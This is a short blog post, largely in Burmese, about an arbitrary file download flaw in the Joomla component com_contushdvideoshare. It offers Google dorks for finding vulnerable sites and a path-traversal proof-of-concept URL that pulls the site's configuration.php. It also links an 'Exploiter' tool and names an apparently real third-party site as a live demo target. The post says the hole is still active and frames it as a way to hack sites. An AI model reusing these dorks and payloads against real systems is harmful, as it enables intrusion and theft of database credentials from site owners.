Joomla component com_contushdvideoshare - Arbitrary File Download Vulnerability

 

           Arbitrary File Download Vuln အေၾကာင္းတီးမိေခါက္မိထားတဲ့သူေတြအတြက္ပါ...

ခုလက္ရွိ Active ျဖစ္ေနတုန္း Vuln အသစ္တစ္ခုဆုိလည္း မမွားဘူးထင္တာဘဲဗ်ာ..

Remote Server ကေန Config File Download ခ်ျပီး Hack တယ္နည္းဆုိ ပုိမွန္မယ္..

Google Dork: "com_contushdvideoshare" 

                                             or 

Google Dork: "/components/com_contushdvideoshare/hdflvplayer/"

POC :  localhost//components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php

အဆင္ေျပမယ္ထင္တယ္... ကြ်န္ေတာ့အတြက္ေတာ့ အဆင္ေျပေနတုန္း မုိ ့ပါ :P

Exploiter သုံး ခ်င္တဲ ့သူေတြအတြက္ Exploiter တစ္ခုလုပ္ေပးထားပါတယ္..

Exploiter : http://msys.yzi.me/joomla%20componet.php

Demo > http://fcat.dyndns.org/components/com_contushdvideoshare/views/membercollection/

Vuln  >http://fcat.dyndns.org/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php

Img >

 

With  Exploiter > 

How?:P

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com